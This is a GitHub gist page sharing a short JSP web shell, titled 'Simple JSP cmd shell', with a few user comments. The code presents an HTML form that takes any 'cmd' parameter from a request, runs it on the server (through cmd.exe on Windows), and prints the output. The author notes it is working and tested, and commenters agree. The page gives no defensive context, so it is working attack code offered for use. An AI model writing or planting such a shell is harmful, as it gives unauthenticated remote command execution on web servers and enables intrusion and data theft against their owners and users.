Skip to content

Instantly share code, notes, and snippets.

@nikallass
Created April 30, 2018 16:54
Show Gist options
  • Star 21 You must be signed in to star a gist
  • Fork 12 You must be signed in to fork a gist
  • Save nikallass/5ceef8c8c02d58ca2c69a29a92d2f461 to your computer and use it in GitHub Desktop.
Save nikallass/5ceef8c8c02d58ca2c69a29a92d2f461 to your computer and use it in GitHub Desktop.
Simple JSP cmd shell
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p;
if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
}
else{
p = Runtime.getRuntime().exec(request.getParameter("cmd"));
}
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
@nikallass
Copy link
Author

Simple working cmd shell. Checked.

@epicn1337
Copy link

yeah this work great

@nowakowsky
Copy link

Great job mate, thank you!

@yairs123
Copy link

linux

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment